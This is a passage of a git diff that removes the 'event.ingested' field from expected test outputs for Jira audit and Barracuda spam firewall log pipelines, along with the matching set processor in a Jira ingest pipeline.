Assignee\",\"to\":\"Unassigned\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":297000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -5816,7 +5736,6 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-24T00:58:20.169992629Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project roles changed\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.common.words.users\",\"key\":\"Users\",\"to\":\"JIRAUSER10000\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":506000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5886,7 +5805,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:20.169993362Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 1.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-14\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":521000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5973,7 +5891,6 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-24T00:58:20.169994174Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6036,7 +5953,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:20.169994909Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Version 2.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 2.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-28\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":543000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6111,7 +6027,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:20.169995643Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Version 3.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 3.0\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":545000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6181,7 +6096,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:20.169996370Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"85\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 85\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539922,\"nano\":856000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6252,7 +6166,6 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-24T00:58:20.169997106Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"jira.auditing.user.login.failed\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Current number of failed login attempts\",\"nameI18nKey\":\"jira.auditing.user.login.failed.count\",\"value\":\"2\"},{\"name\":\"Reason for failed login\",\"nameI18nKey\":\"jira.auditing.user.login.failed.reason\",\"value\":\"User couldn't be authenticated\"}],\"method\":\"Browser\",\"source\":\"172.17.0.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955310,\"nano\":718000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.login.failed", @@ -6328,7 +6241,6 @@ "ip": "10.100.100.2" }, "event": { - "ingested": "2021-12-24T00:58:20.169997911Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login successful\",\"actionI18nKey\":\"jira.auditing.user.logged.in\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=admin.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955209,\"nano\":363000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.logged.in", 
diff --git a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 05b6e111e62..d13826428a2 100644 --- a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index 697493e060b..8902961fc79 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361565502Z" - }, "message": "notify/smtp[avolupt]: 10.224.15.48 nto sse accept tur 3 illumqui 1090 1.2364 ivelitse ritin", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361569329Z" - }, "message": "inbound/pass1: etdo[10.173.228.223] ntsunti 1455282753 1455282753 SCAN nseq itinvol psa umq 0 31 psaq SZ:cer SUBJ:reveri", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361570529Z" - }, "message": "outbound/smtp: 10.104.162.169 eosquir orsi nulapari allow vol 4 uidolor nibus mipsumq \u003c\u003cgnaali\u003e: enatus", "tags": [ "preserve_original_event" 
@@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361571721Z" - }, "message": "notify/smtp[iatu]: 10.57.70.73 dolo meumfug deny roinBCS 2 com 1060 1.2548 byC tinculp", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361572753Z" - }, "message": "outbound/smtp: 10.236.42.236 tconsec nsequat taev block untutl 1 llu uptassi tamremap tur", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361573772Z" - }, "message": "reports: REPORTS (enatuse.exe) queued as magn", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361574712Z" - }, "message": "inbound/pass1[sit]: avol[10.162.151.94] laboreet 1461457525 1461457525 RECV aquaeabi giatq quid", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361575670Z" - }, "message": "inbound/pass1: tempor[10.138.137.28] eip 1462692479 1462692479 SCAN lupta iusmodt doloreeu pori 7 8 ect SZ:reetdolo SUBJ:nrepreh", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361576607Z" - }, "message": "scan: ari[10.108.180.105] nsequat 1463927433 1463927433 block llam llamcorp ari eataevit 4 38 uovol dmi", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361577549Z" - }, "message": "inbound/pass1: [10.206.159.177] ididu 1465162388 1465162388 RECV ciunt turQuisa 10 74 lit", "tags": [ "preserve_original_event" 
@@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361578570Z" - }, "message": "inbound/pass1[umdo]: sed[10.206.224.241] reetdolo 1466397342 1466397342 RECV olupta turveli 4 40 tatno", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361579751Z" - }, "message": "inbound/pass1: aveniam[10.82.201.113] essequ 1467632296 1467632296 SCAN taevi ender snulapar aedic 5 13 iumto SZ:aboreetd SUBJ:sun", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361580718Z" - }, "message": "reports: REPORTS (tem.exe) queued as ons", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361581686Z" - }, "message": "outbound/smtp: 10.110.109.5 ittenbyC aperi lor accept ipi 4 paqu eseru remeum #to#10.18.165.35", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361582624Z" - }, "message": "scan: dolore[10.195.109.134] eddoei 1471337159 1471337159 deny etM nimadmin ditautfu piscing 6 74 ostr rudexerc", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361583565Z" - }, "message": "scan[colabor]: iusmodt[10.21.92.218] lorumw 1472572113 1472572113 accept llitani inima tlabo suntexp 4 45 stiae SZ:nofdeF SUBJ:sunt", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361584711Z" - }, "message": "reports: REPORTS (tat.exe) queued as tion", "tags": [ "preserve_original_event" 
@@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361585679Z" - }, "message": "reports: REPORTS (emp.exe) queued as aperia", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361586643Z" - }, "message": "web: Ret Policy Summary (Del:eritquii Kept:dexeac)", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361587593Z" - }, "message": "web: [10.45.25.68] LOGOUT (rehender)", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361588531Z" - }, "message": "web: Ret Policy Summary (Del:hil Kept:atquovo)", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361589473Z" - }, "message": "notify/smtp[tatn]: 10.18.109.121 ents pida allow idolor 1 emoeni 269 1.2857 utlabore ecillu", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361590399Z" - }, "message": "web: [10.19.194.101] global CHANGE orinrepr (conse)", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361591519Z" - }, "message": "reports: REPORTS (lumqui.exe) queued as itinvo", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361592459Z" - }, "message": "reports: REPORTS (usmodt.exe) queued as siar", "tags": [ "preserve_original_event" 
@@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361593404Z" - }, "message": "notify/smtp[sci]: 10.116.193.182 snostrud nama allow data 1 ationul 2530 1.5361 commod adol", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361594346Z" - }, "message": "inbound/pass1: hitect[10.198.6.166] modocon 1486156610 1486156610 SCAN que atevel nsecte itame 0 38 lit5929.test quamnih", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361595291Z" - }, "message": "outbound/smtp: 10.198.19.111 aquaeabi lita adeseru accept amc 4 amest corp modtemp \u003c\u003crehender\u003e: iae", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361596263Z" - }, "message": "inbound/pass1: equat[10.77.137.72] ione 1488626519 1488626519 SCAN ihilmole eriamea amre rsita 8 56 uptat3156.www5.test tmo", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361597225Z" - }, "message": "inbound/pass1: vitaedi[10.128.114.77] temqu 1489861473 1489861473 SCAN edol colab ommodico quatD 4 59 neav6028.internal.domain agnid", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361598182Z" - }, "message": "outbound/smtp: 10.181.80.139 hitecto ents liquide allow tenatu 1 boN eprehend aevit aboN", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361599134Z" - }, "message": "inbound/pass1[ris]: uamqu[10.138.252.123] quioffi 1492331381 1492331381 RECV uptate ncidid quaturve", "tags": [ "preserve_original_event" 
@@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361600080Z" - }, "message": "reports: REPORTS (aera.exe) queued as ate", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361601018Z" - }, "message": "inbound/pass1: [10.153.108.27] uir 1494801290 1494801290 RECV dol essecil citation", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361602118Z" - }, "message": "outbound/smtp: 10.120.167.239 gnido ratvolu olup deny nsecte 3 eveli eroi dtemp aliquide", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361603131Z" - }, "message": "inbound/pass1[ris]: nisi[10.105.88.20] ecte 1497271198 1497271198 RECV tinvolu iurer iciadese", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361604068Z" - }, "message": "scan: olupta[10.98.92.244] idolor 1498506153 1498506153 deny uta llumdolo nre ercitat 7 38 riosamn SZ:ept SUBJ:iumtotam", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361605014Z" - }, "message": "scan[sperna]: sintocc[10.185.107.75] tDuisaut 1499741107 1499741107 allow tate imvenia spi stquido 8 62 ptas SZ:pta SUBJ:tetu", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361605945Z" - }, "message": "reports: REPORTS (nevo.exe) queued as ide", "tags": [ "preserve_original_event" 
@@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361606917Z" - }, "message": "notify/smtp[etcons]: 10.80.214.206 ate uiac accept officiad 4 quinesc 6218 1.5651 tur roi", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361607869Z" - }, "message": "notify/smtp[nof]: 10.48.34.226 ccaec ten allow isc 2 ntN 6179 1.2364 tateve itinvol", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361688315Z" - }, "message": "reports: REPORTS (etconsec.exe) queued as ios", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361722930Z" - }, "message": "inbound/pass1: tquov[10.211.93.62] mod 1505915878 1505915878 SCAN hilm ataevi com tnulapa 5 57 tiumt SZ:reetdolo SUBJ:norum", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361725661Z" - }, "message": "reports: REPORTS (uidol.exe) queued as mporin", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361727053Z" - }, "message": "scan: qui[10.199.182.123] entor 1508385787 1508385787 accept Sedutp utp ema rsitv 0 69 ntiumt iquipe", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361728052Z" - }, "message": "reports: REPORTS (tvolupt.exe) queued as eufugi", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361729089Z" - }, "message": "scan[pid]: illoin[10.130.38.118] uamni 1510855695 1510855695 block gnamal metMalo ntexplic archite 1 56 untu asi", "tags": [ "preserve_original_event" 
@@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361730068Z" - }, "message": "inbound/pass1: [10.153.152.219] eumiu 1512090649 1512090649 RECV orumSe boree intoc", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361731044Z" - }, "message": "web: Retention violating accounts: rnatur total", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361732070Z" - }, "message": "reports: REPORTS (isisten.exe) queued as cusant", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361733219Z" - }, "message": "reports: REPORTS (naal.exe) queued as borios", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361734177Z" - }, "message": "outbound/smtp: 10.167.227.44 tali lillum cusant deny ender 2 oles edic seq tutlab", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361735114Z" - }, "message": "notify/smtp[atevelit]: 10.56.136.27 aperia ccaeca deny ttenby 1 amc 5163 1.375 orumSe ratv", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361736066Z" - }, "message": "web: [10.194.90.130] FAILED_LOGIN (siut)", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361737020Z" - }, "message": "inbound/pass1: [10.103.69.44] velitess 1520735329 1520735329 RECV naali uunturm temUte", "tags": [ "preserve_original_event" 
@@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361741215Z" - }, "message": "inbound/pass1: aveni[10.29.155.171] uptatema 1521970284 1521970284 SCAN oeni tdol sit tiaec 6 23 oremagna3521.mail.home asiar", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361742249Z" - }, "message": "inbound/pass1: [10.145.193.93] nonp 1523205238 1523205238 RECV labo ulapar aboreetd", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361743231Z" - }, "message": "inbound/pass1[ama]: uatur[10.143.79.226] exeacom 1524440192 1524440192 RECV roidents tem dol", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361744211Z" - }, "message": "web: [10.30.25.84] FAILED_LOGIN (utlab)", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361745168Z" - }, "message": "inbound/pass1: [10.141.225.182] bor 1526910101 1526910101 RECV rauto ationev 8 57 uaUten", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361792198Z" - }, "message": "reports: REPORTS (dun.exe) queued as reprehe", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361795559Z" - }, "message": "web: [10.90.9.88] global CHANGE umexerc (oremipsu)", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361797321Z" - }, "message": "reports: REPORTS (amco.exe) queued as ssecillu", "tags": [ "preserve_original_event" 
@@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361817089Z" - }, "message": "reports: REPORTS (olo.exe) queued as psumqu", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361818986Z" - }, "message": "notify/smtp[rationev]: 10.226.20.199 tatem untutlab allow eveli 2 lillum 7809 1.2000 uisaute imide", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361820077Z" - }, "message": "web: [10.134.140.191] global CHANGE nte (mvel)", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361821091Z" - }, "message": "outbound/smtp[conse]: 10.252.40.172 nimadmin isiu licabo cancel etdolor 3 dic cola amcor", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361822059Z" - }, "message": "scan[xea]: ites[10.126.26.131] nisiut 1536789735 1536789735 accept teturad perspici itation sequatD 5 24 isciv rroqu", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361823014Z" - }, "message": "scan[rExc]: iusmo[10.187.210.173] reetd 1538024689 1538024689 accept ulpa sitam rad loi 2 15 Nequepor SZ:eirure SUBJ:deserun", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361824315Z" - }, "message": "reports: REPORTS (orroq.exe) queued as vitaedic", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361825279Z" - }, "message": "reports: REPORTS (orem.exe) queued as rcit", "tags": [ "preserve_original_event" 
@@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361826354Z" - }, "message": "scan[untincul]: ssecil[10.180.147.129] atise 1541729552 1541729552 allow umetMalo oluptas emvele isnost 2 5 ido emqu", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361827298Z" - }, "message": "notify/smtp[exeaco]: 10.99.17.210 olorsit tore cancel illu 4 turadip 688 1.7484 boreetdo undeom", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361828249Z" - }, "message": "notify/smtp[uov]: 10.230.46.162 sBono loremqu accept quunt 3 siuta 1107 1.2607 dquia temporin", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361829553Z" - }, "message": 